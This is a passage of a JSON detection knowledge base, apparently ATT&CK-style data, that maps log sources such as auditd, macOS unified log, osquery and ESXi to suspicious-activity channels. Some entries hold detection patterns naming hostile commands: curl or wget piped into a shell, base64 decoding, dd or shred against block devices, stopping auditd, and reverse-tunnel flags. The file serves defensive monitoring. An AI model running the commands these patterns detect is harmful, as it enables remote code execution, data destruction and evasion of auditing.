                            "channel": "execve network tools"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "process_events"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve calls to soffice.bin with suspicious macro execution flags"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process execution of Microsoft Word, Excel, PowerPoint with macro execution attempts"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "process reading browser configuration paths"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec logs"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "execve: Processes launched with LD_PRELOAD/LD_LIBRARY_PATH pointing to non-system dirs"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "exec: Process execution context for loaders calling dlopen/dlsym"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "EXECVE"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "execution of unexpected binaries during user shell startup"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launch of Terminal.app or shell with non-standard environment setup"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "ES_EVENT_TYPE_NOTIFY_EXEC with unusual parent-child process relationships from zsh"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve of systemctl or service stop"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve of launchctl or pkill"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process::exec"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of klist, kinit, or tools interacting with ccache outside normal user context"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "Execution of non-standard binaries accessing Kerberos APIs"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Electron-based binary spawning shell or script interpreter"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Electron app spawning unexpected child process"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "/root/.ash_history or /etc/init.d/*"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve calls with high-frequency or known bandwidth-intensive tools"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec or spawn calls to proxy tools or torrent clients"
                        },
                        {
                            "name": "containers:osquery",
                            "channel": "bandwidth-intensive command execution from within a container namespace"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process launch"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream --info --predicate 'subsystem == \"com.apple.cfprefsd\"'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of security, sqlite3, or unauthorized binaries"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Unexpected applications generating outbound DNS queries"
                        },
                        {
                            "name": "linux:Sysmon",
                            "channel": "EventCode=1"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "execve"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Unexpected child process of Safari or Chrome"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve or syscall invoking vm artifact check commands (e.g., dmidecode, lspci, dmesg)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of system_profiler, ioreg, kextstat with argument patterns related to VM/sandbox checks"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process writes or modifies files in excluded paths"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "com.apple.mail.* exec.*"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of memory inspection tools (lldb, gdb, osqueryi)"
                        },
                        {
                            "name": "esxi:vobd",
                            "channel": "/var/log/vobd.log"
                        },
                        {
                            "name": "kubernetes:apiserver",
                            "channel": "kubectl exec or kubelet API calls targeting running pods"
                        },
                        {
                            "name": "docker:audit",
                            "channel": "Process execution events within container namespace context"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "process persists beyond parent shell termination"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "background process persists beyond user logout"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of scripts or binaries sourced from mail directories (/var/mail, ~/Maildir)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Preview.app, Safari.app, or Mail.app spawning new processes outside normal patterns"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "process execution across cloud VM"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "systemctl spawning managed processes"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "None"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "/var/log/shell.log"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of processes linked to hijacked sessions (e.g., anomalous parent-child process lineage)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec events where web process starts a shell/tooling"
                        },
                        {
                            "name": "docker:events",
                            "channel": "Docker/Kubernetes audit of exec/attach (kubectl exec) or unexpected child processes inside container"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec of osascript, bash, curl with suspicious parameters"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of container management CLIs (docker, crictl, kubectl) or interpreted shells (sh, bash, python) within container context"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "es_event_exec"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of discovery commands targeting backup binaries, processes, or config paths"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process execution logs showing discovery commands like mdfind, system_profiler, or launchctl list"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "process_events OR launchd"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "execve"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "launchd or process_events"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process and file events via log stream"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of scripts or binaries spawned from browser processes"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Browser processes launching unexpected interpreters (osascript, bash)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec: Execution of defaults, plutil, or common editors (vim/nano) targeting plist files"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "EXECVE"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process:exec"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of bash, python, or perl processes spawned by browser/email client"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of osascript, bash, or Terminal initiated from Mail.app or Safari"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve of /bin/sh,/bin/bash,/usr/bin/curl,/usr/bin/python by service accounts (e.g., apache, mysql, nobody) immediately after inbound network activity."
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "parent_name in ('sshd','httpd','screensharingd') spawning shells or scripting runtimes."
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process activity stream"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "SYSCALL record where exe contains passwd/userdel/chage and auid != root"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Post-login execution of unrecognized child process from launchd or loginwindow"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve of base64|openssl|xxd|python|perl with arguments matching Base64 flags"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process command line contains base64, -enc, openssl enc -base64"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "exec: arguments contain Base64-like strings"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "commands containing base64, openssl enc -base64, xxd -p"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of process launched via loginwindow session restore"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process: exec + filewrite: ~/.ssh/authorized_keys"
                        },
                        {
                            "name": "containerd:runtime",
                            "channel": "/var/log/containers/*.log"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of Java apps or other processes with hidden window attributes"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process Execution"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve on code or jetbrains-gateway with remote flags"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process: code or jetbrains-gateway launching with --tunnel or --remote"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream --predicate 'processImagePath CONTAINS \"curl\" OR \"osascript\"'"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "Execution of dd, shred, wipe targeting block devices"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve of sleep or ping command within script interpreted by bash/python"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve or socket/connect system calls from processes using crypto libraries"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process using AES/RC4 routines unexpectedly"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "execution of known firewall binaries"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "type=EXECVE or SYSCALL for /bin/date, /usr/bin/timedatectl, /sbin/hwclock, /bin/cat /etc/timezone, /bin/cat /proc/uptime"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "execve: command like 'date', 'timedatectl', 'hwclock', 'cat /etc/timezone'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process exec events of systemsetup, date, ioreg with command_line parameters indicating time discovery"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "exec: binary == \"/usr/sbin/systemsetup\" and args contains \"-gettimezone\""
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "execve: command LIKE '%systemsetup -gettimezone%' OR '%date%'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of osascript, curl, or unexpected automation"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec /usr/bin/pwpolicy"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "socket(AF_PACKET|AF_INET, SOCK_RAW, *), setsockopt(\u2026 SO_ATTACH_FILTER|SO_ATTACH_BPF \u2026), bpf(cmd=BPF_PROG_LOAD), open/openat path=\"/dev/bpf*\" (BSD/macOS-like) or setcap cap_net_raw."
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "KERN messages about eBPF program load/verify or LSM denials related to bpf."
                        },
                        {
                            "name": "OpenBSM:AuditTrail",
                            "channel": "open/openat of /dev/bpf*; ioctl BIOCSETF-like operations."
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Exec of tcpdump, rvictl, custom tools linked to libpcap.A.dylib; sysextd/systemextensionsctl events for NetworkExtension content filters."
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "/usr/sbin/postfix, /usr/sbin/exim, /usr/sbin/sendmail"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execution of known flash tools (e.g., flashrom, fwupd)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "com.apple.firmwareupdater activity or update-firmware binary invoked"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve of system tools like dmidecode, lspci, lscpu, dmesg, systemd-detect-virt"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec or spawn of 'system_profiler', 'ioreg', 'kextstat', 'sysctl', or calls to sysctl API"
                        },
                        {
                            "name": "macos:endpointSecurity",
                            "channel": "ES_EVENT_TYPE_NOTIFY_EXEC"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Suspicious binaries or scripts interacting with authentication binaries (sshd, gdm, login)"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "execve: Processes unexpectedly invoking Keychain or authentication APIs"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: execve calls where a browser/webview process is parent and child is interpreter (python, sh, ruby) or downloader (curl, wget)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process_create: Process creation where parent is Safari/Google Chrome and child is script interpreter or signed-but-unusual helper binary"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "None"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process:launch"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "Shell commands invoked by SQL process such as postgres, mysqld, or mariadbd"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve of smbclient, smbmap, rpcclient, nmblookup, crackmapexec smb"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "ES_EVENT_TYPE_NOTIFY_EXEC: Process execution of \"sharing -l\", \"smbutil view\", \"mount_smbfs\""
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of scp, rsync, curl with remote destination"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "logMessage contains pbpaste or osascript"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve call with argv matching known disk enumeration commands (lsblk, parted, fdisk)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process launch of diskutil or system_profiler with SPStorageDataType"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "execution of esxcli with args matching 'storage', 'filesystem', 'core device list'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Mail.app executing with parameters updating rules state"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "/var/log/vmkernel.log, /var/log/vmkwarning.log"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "exec: Exec of ffmpeg, avfoundation-based binaries, or custom signed apps accessing camera"
                        },
                        {
                            "name": "kubernetes:apiserver",
                            "channel": "exec into pod followed by secret retrieval via API"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process_name IN (\"VBoxManage\", \"prlctl\") AND command CONTAINS (\"list\", \"show\")"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec srm|exec openssl|exec gpg"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "Process execution with LD_PRELOAD or modified library path"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of process with DYLD_INSERT_LIBRARIES set"
                        },
                        {
                            "name": "linux:Sysmon",
                            "channel": "process creation events linked to container namespaces executing host-level binaries"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process and signing chain events"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launchservices events for misleading extensions"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "Execution of disguised binaries"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "process listening or connecting on non-standard ports"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launchd services binding to non-standard ports"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve, connect"
                        },
                        {
                            "name": "esxi:cron",
                            "channel": "process or cron activity"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of binaries with unsigned or anomalously signed certificates"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve logging for /usr/bin/systemctl and systemd-run"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "Invocation of osascript or dylib injection"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of files saved in mail or download directories"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of Terminal, osascript, or other interpreters originating from Mail or Preview"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process events"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Unauthorized sudo or shell access, especially leading to file changes in /var/www or /srv/http"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of unexpected terminal or web scripts modifying /Library/WebServer/Documents"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of CLI tools like psql, mysql, mongo, sqlite3"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process start of Java or native DB client tools"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "loginwindow or tccd-related entries"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "query: process_events, launchd, and tcc.db access"
                        },
                        {
                            "name": "ebpf:syscalls",
                            "channel": "process execution or network connect from just-created container PID namespace"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of pip, npm, gem, or similar package managers"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Command line invocation of pip3, brew install, npm install from interactive Terminal"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "fork/exec of service via PID 1 (systemd)"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "Execution of ssh/scp/sftp without corresponding authentication log"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of ssh or sftp without corresponding login event"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: execve where exe=/usr/bin/python3 or similar interpreter"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launch of remote desktop app or helper binary"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Unexpected processes making network calls based on DNS-derived ports"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launchctl spawning new processes"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launchctl activity and process creation"
                        },
                        {
                            "name": "containerd:events",
                            "channel": "New container with suspicious image name or high resource usage"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of Python, Swift, or other binaries invoking archiving libraries"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "Processes linked with libssl or crypto libraries making outbound connections"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process invoking SSL routines from Security framework"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Execution of binaries located in /etc/init.d/ or systemd service paths"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of binary listed in newly modified LaunchAgent plist"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of bless or nvram modifying boot parameters"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Unexpected processes registered with launchd"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process launch"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of curl, osascript, or unexpected Office processes"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "exec"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Trust validation failures or bypass attempts during notarization and code signing checks"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "spawned shell or execution environment activity"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process_exec: image in {/bin/bash,/bin/zsh,/usr/bin/osascript,/usr/bin/python*,/usr/bin/curl,/usr/bin/ssh,/usr/bin/open} AND parent in {Preview, TextEdit, Microsoft Word, Microsoft Excel, AdobeReader, Archive Utility, Finder}"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: exe in {/bin/bash,/bin/sh,/usr/bin/python*,/usr/bin/perl,/usr/bin/php,/usr/bin/node,/usr/bin/curl,/usr/bin/wget,/usr/bin/xdg-open,/usr/bin/ssh,/usr/bin/rundll32 (wine)} AND ppid process is a document viewer/browser"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "Execution of dd/sgdisk with arguments writing to sector 0 or partition table"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of zip, ditto, hdiutil, or openssl by processes not normally associated with archiving"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process execution events for chmod, chown, chflags with unusual parameters or targets"
                        },
                        {
                            "name": "m365:defender",
                            "channel": "AdvancedHunting(DeviceEvents, ProcessCreate, ImageLoad, AMSI/ETW derived signals)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execve or dylib load from memory without backing file"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Commands that alter firewall or start listeners: iptables|nft|ufw|firewall-cmd|pfctl|systemctl start sshd/telnet/dropbear; raw-socket/libpcap tools (tcpdump, tshark, nmap --raw)."
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec: Execution of pfctl, socketfilterfw, launchctl start ssh/telnet, libpcap consumers."
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "Shell Execution"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Unusual child process tree indicating attempted recovery after crash"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of binaries/scripts presenting false health messages for security daemons"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of processes mimicking Apple Security & Privacy GUIs"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve, setifflags"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "process_events where path like '%tcpdump%'"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "Execution of dd, shred, or wipe with arguments targeting block devices"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "systemctl stop auditd, kill -9 <pid>, or modifications to /etc/selinux/config"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of curl, git, or Office processes with network connections"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream - process subsystem"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve calls for qemu-system*, kvm, or VBoxHeadless"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process execution for VBoxHeadless, prl_vm_app, vmware-vmx"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process logs"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "None"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve of interpreters (python, perl), custom binaries, or shell utilities with long arguments containing non-standard tokens"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "ES_EVENT_TYPE_NOTIFY_EXEC: arguments contain long, non-standard tokens / custom alphabets"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "command line or log output shows non-standard encoding routines"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "commands containing long non-standard tokens or custom lookup tables"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of /usr/sbin/installer spawning child process from within /private/tmp or package contents"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Execution of dpkg or rpm followed by fork/execve from within postinst, prerm, etc."
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execve: Helper tools invoked through XPC executing unexpected binaries"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of modified binary without valid signature"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: exe in (/usr/bin/bash,/usr/bin/sh,/usr/bin/zsh,/usr/bin/python*) AND cmdline matches '(curl|wget).*(\\||\\|\\s*sh|bash)|base64\\s*-d|python\\s*-c'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec: ParentImage in (Terminal, iTerm2) AND Image in (/bin/zsh,/bin/bash,/usr/bin/python*) AND CommandLine matches '(curl|wget).*(\\||\\|\\s*sh|bash)|base64 -D|python -c'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process created with repeated ICMP or UDP flood behavior"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "binary execution of security_authtrampoline"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process: exec"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "Exec"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Child processes of Safari, Chrome, or Firefox executing scripting interpreters"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of older or non-standard interpreters"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "process execution events for permission modification utilities with command-line analysis"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process execution events for chmod, chown, chflags with parameter analysis and target path examination"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "process execution monitoring for permission modification utilities with command-line argument analysis"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Invocation of packet generation tools (e.g., hping3, nping) or fork bombs"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "Execution of flooding tools or compiled packet generators"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "process"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve for proxy tools"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process, socket, and DNS logs"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "process_events table"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Command line containing `trap` or `echo 'trap` written to login shell files"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log collect --predicate"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve or nanosleep with no stdout/stderr I/O"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launchd or osascript spawns process with delay command"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "systemd-udevd spawning user-defined action from RUN+="
                        },
                        {
                            "name": "ebpf:syscalls",
                            "channel": "execve"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process:spawn"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream --predicate 'eventMessage contains \"exec\"'"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "cat|less|grep accessing .bash_history from a non-shell process"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "Process execution via .desktop Exec path from /etc/xdg/autostart or ~/.config/autostart"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Execution of dpkg, rpm, or other package manager with list flag"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of system_profiler or osascript invoking enumeration"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "apache2 or nginx spawning sh, bash, or python interpreter"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "httpd spawning bash, zsh, python, or osascript"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of /usr/libexec/security_authtrampoline or child processes originating from non-trusted binaries triggering credential prompts"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of security or osascript"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launchd spawning processes tied to new or modified LaunchDaemon .plist entries"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of ping, nping, or crafted network packets via bash or python to reflection services"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of commands modifying iptables/nftables to block selective IPs"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "System process modifications altering DNS/proxy settings"
                        },
                        {
                            "name": "containerd:Events",
                            "channel": "unusual process spawned from container image context"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "curl, python scripts, rsync with internal share URLs"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process: spawn, exec"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "Rapid spawning of resource-heavy applications (e.g., Preview, Safari, Office)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process creation events where command line = pmset with arguments affecting sleep, hibernatemode, displaysleep"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Unexpected apps performing repeated DNS lookups"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launchservices or loginwindow events"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve with LD_PRELOAD or linker-related environment variables set"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of process with DYLD_INSERT_LIBRARIES set"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Suspicious Swift/Objective-C or scripting processes writing archive-like outputs"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve of re-parented process"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "Anomalous parent PID change"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process creation with parent PID of 1 (launchd)"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "child process invoking dynamic linker post-ptrace"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "Processes executing kextload, spctl, or modifying kernel extension directories"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "Unsigned or ad-hoc signed process executions in user contexts"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of diskutil or hdiutil attaching hidden partitions"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process execution events for discovery utilities (system_profiler, sw_vers, dscl, networksetup) with command-line parameter analysis"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "process event monitoring with focus on discovery utilities and cryptographic framework usage correlation"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Unexpected apps generating frequent DNS queries"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process exec"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "socket: Suspicious creation of AF_UNIX sockets outside expected daemons"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Non-standard processes invoking financial applications or payment APIs"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Agent/headless flags (listen/connect/reverse/tunnel) or remote-control binaries spawning shells"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "systemctl enable/start: Creation/enablement of custom .service units in /etc/systemd/system"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process exec of remote-control apps or binaries with headless/connect flags"
                        },
                        {
                            "name": "auditd:SYSCALL",
